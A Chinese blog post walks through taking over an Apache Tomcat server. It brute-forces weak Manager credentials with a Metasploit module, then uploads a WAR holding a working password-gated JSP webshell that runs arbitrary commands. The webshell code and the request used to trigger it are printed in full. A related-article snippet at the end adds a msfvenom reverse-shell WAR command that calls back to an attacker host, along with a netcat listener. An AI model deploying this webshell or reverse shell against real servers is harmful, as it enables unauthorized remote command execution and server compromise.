Tomcat弱口令+war部署getshell

最新推荐文章于 2024-08-06 10:13:47 发布
原创 最新推荐文章于 2024-08-06 10:13:47 发布 · 287 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#tomcat #jsp

影响版本

全版本

漏洞复现

msf爆破

use auxiliary/scanner/http/tomcat_mgr_login

设置IP和端口

set rhosts 10.7.10.41
set rport 8080(默认端口)

run运行
在这里插入图片描述

tomcat:tomcat

在这里插入图片描述
登陆成功
在这里插入图片描述
用大佬的jsp一句话马
在这里插入图片描述

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

然后把shell.jsp压缩成zip然后改后缀为1.war上传
在这里插入图片描述
访问地址:http://xxxxxx:8080/1/shell.jsp
传参pwd和i

?pwd=123&i=ls(执行命令)

在这里插入图片描述
QQ:3075999532

参考文章:
https://www.cnblogs.com/mke2fs/p/12718669.html
https://www.cnblogs.com/qianxinggz/p/13440366.html

Tomcat Manager口令爆破&利用Tomcat弱口令上传文件拿Shell&加固(详细到不能再详细了)
Aven.H的博客
08-20 4200
利用Tomcat弱口令上传文件获取系统权限 1. 漏洞详情: 当tomcat的manager管理界面存在弱口令时,可以登录后台上传war包,上传的war文件会自动解压至web目录下,可以访问上传木马文件并执行,获取系统权限,般都是服务器的最高权限。 2. 环境搭建: (1) 服务器:windows_server2008 (2) 安装所需环境:jdk+apache+tomcat 配置jdk+Apache Tomcat 8.0.20,能正常访问tomcat默认界面。 这里要注意个事
Tomcat页面弱口令war包上传Getshell
来到了学渣的博客
07-19 3205
思路 burpsuit对tomcat进行弱口令爆破→利用弱口令进入tomcat管理页面→制作war包上传getshell 在vulhub路径/vulhub/tomcat/tomcat8中启动tomcat环境 Tomcat默认页面登录管理在manager/html路径下 启动burpsuit抓包进行弱口令爆破 对Basic后面那段base64进行解码发现是这样的个格式 账号:密码 发送至爆破处 然后再选择encode编码 阿里云搭建漏洞环境跑爆破居然会ban掉自己ip。。。只能从虚拟机来
Tomcat弱口令进入后台部署wargetshell
weixin_50053818的博客
06-30 1275
文章目录环境docker+vuhub搭建环境爆破进入后台上传wargetshell 环境 vulhub docker-compose kali docker+vuhub搭建环境 通过git将vulhub仓库克隆到本地中。 ``` git clone https://github.com/vulhub/vulhub ``` 进入vulhub目录下的tomcat目录即可。 执行docker-compose up -d即可完成tomcat的搭建。 爆破进入后台 直接访问ip:port即可进入tomca
Tomcat WAR部署getshell
aqi_sec的博客
07-06 2459
Tomcat WAR部署getshell
Tomcat弱口令后台部署wargetshell
qq_59102311的博客
04-24 3145
3.点击Manager App,跳转http://127.0.0.1:8080/manager/html,要求登录验证。6.使用auxiliary/scanner/http/tomcat_mgr_login模块,查看详细信息。1.进入/vulhub/tomcat/tomcat8目录,启动docker。8.运行模块,爆破得出用户名和密码:tomcat:tomcat。13. 打开蚁剑,输入url,密码cmd,成功getshell。11.使用cmd命令,将jsp文件打包成war包。7.设置目标IP和目标端口。
【 漏洞复现 】Tomcat 后台弱口令部署wargetshell
qq_48368964的博客
08-06 982
tomcat8环境下默认进入后台的密码为 tomcat/tomcat,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令
vulhub之tomcat弱口令+部署warGetShell
lionwerson的博客
04-04 695
1.拉取靶场镜像,打开靶场 2.登陆抓包进行爆破,设置个位置,然后选择类型为custom iterator,然后在下面payload选项中选择三个位置,然后增加编码的方式,最后定要取消勾选,在选项最下面的url编码特殊字符,否则就算爆出了弱口令也无法显示成功。 如果勾选了url编码特殊字符就会让生成的base64编码的结尾的等号被url编码,即使看到的payload正确,但是请求不正确,所以显示不成功。 密码是tomcat,用户名也是。 3.进入后台上传文件,然后getshel.
Tomcat7+ 弱口令 +后台getshell漏洞
m0_52701599的博客
02-17 836
Tomcat7+ 弱口令 && 后台getshell漏洞
vulhub复现之tomcat8.0.43弱口令&war远程部署漏洞复现
m0_70483044的博客
07-19 3428
学习时间2022.7.18日之计在于晨,年之计在于春。
Tomcat后台拿shell (war
blrk
02-20 2246
http://huaidan.org/archives/1207.html
Tomcat后台上传wargetshell复现
一瓶草莓酱的博客
03-17 4040
环境搭建 页面浏览: 漏洞简介 tomcat是apache软件基金会的核心项目,tomcat服务器是个免费的开放源代码的web应用服务器,属于轻量级应用服务器。默认端口:8080 tomcat个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上,响应消息再通过tomcat返回给浏览器。 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。 图中可以看到ma
tomcat 弱口令tomcat8】
向安全进发的博客
04-20 1480
Tomcat支持后台部署War文件,默认情况下管理页面仅允许本地访问。 攻击条件:如果网站运维/开发人员手动修改配置文件中的信息允许远程IP进行访问(需求),且恶意攻击者拿到管理界面账户密码情况下,则可上传木马文件,控制系统。==
Tomcat部署war
Rickwubaa的博客
02-17 235
Tomcat部署war
Tomcat 弱口令及文件上传漏洞复现
君莫hacker的博客
09-16 3635
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现 0x01 漏洞介绍 漏洞描述 漏洞编号 受影响版本 0x02 环境部署: 搭建次,复现百次 靶机 ip:192.168.30.209 kali ip:192.168.30.182 0x03 漏洞复现 从github下载tomcat8的源码,我们可以查看到tomcat的默认登录名为tomcat,并且密码也为tomcat 点击Server Status进行登录 弱口令tomcat tomcat 直接登录成功 发现文件上传点
Tomcat弱口令爆破&war包上传
weixin_51151498的博客
12-06 1648
tomcat弱口令
src挖掘之Tomcat未授权弱口令+war后门上传
huangyongkang666的博客
07-18 3814
高危src挖掘
[ 中间件漏洞 ] Tomcat 管理界面弱口令+war后门部署
weixin_30384217的博客
07-12 940
前言:   Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。 漏洞复现: 漏洞原理:   Tomcat后台管理界面的用户配置文件为conf目录下的tomcat-users.xml。   登录Tomcat的后台管理界面,上传war包 上传成功后,会自动将war包解压并...
(最新)Tomcat弱口令-上传war包获取websehll漏洞复现
qq1140037586的博客
12-17 1982
tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。登录成功后有上传点,上传压缩包 xxx.war的.war不会被解析,直接访问 xxx/xxx.jsp下的木马文件,拿到webshell。
【Vulfocus靶场-初级】Tomcat后台弱口令+War包文件上传Getshell漏洞复现
08-26 5775
Vulfocus靶场漏洞,Tomcat后台弱口令War包文件上传Getshell漏洞复现,利用冰蝎/哥斯拉进步方便命令执行,获得flag并提交,通过tomcat靶场。
Tomcat弱口令复现及利用(反弹shell)
最新发布
12-13
Tomcat弱口令复现及利用(反弹shell)是种常见的网络安全攻击手段,主要利用Tomcat服务器默认配置中的弱密码进行未授权访问。以下是具体的步骤和利用方法: ### 步骤:扫描目标服务器 首先,需要使用端口扫描工具(如Nmap)扫描目标服务器的开放端口,确认Tomcat服务是否运行在默认的8080端口。 ```bash nmap -p 8080 <目标IP> ``` ### 步骤二:访问Tomcat管理页面 在浏览器中访问`http://<目标IP>:8080/manager/html`,尝试使用默认的用户名和密码进行登录。常见的默认用户名和密码组合有: - `admin/admin` - `tomcat/tomcat` - `manager/manager` ### 步骤三:利用弱口令上传WAR旦成功登录Tomcat管理页面,可以使用WAR包上传功能来部署个恶意的Web应用,从而实现反弹shell。 1. **创建WAR包**:首先,需要创建个包含反弹shell代码的WAR包。可以使用以下命令生成个简单的WAR包: ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=<攻击者IP> LPORT=<攻击者端口> -f war > shell.war ``` 2. **上传WAR包**:在Tomcat管理页面中,选择“部署WAR文件”选项,上传刚刚生成的`shell.war`文件。 ### 步骤四:启动反弹shell 上传成功后,访问`http://<目标IP>:8080/shell/`,此时会触发反弹shell。攻击者需要在本地启动个监听端口来接收反弹的shell连接。 ```bash nc -lvnp <攻击者端口> ``` ### 步骤五:验证反弹shell 旦反弹shell成功,攻击者将获得目标服务器的命令行访问权限,可以执行任意命令。 ### 注意事项 - **合法性**:在进行任何安全测试之前,请确保您已获得目标系统的合法授权。 - **风险**:未经授权的访问和攻击是非法的,可能导致法律责任。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值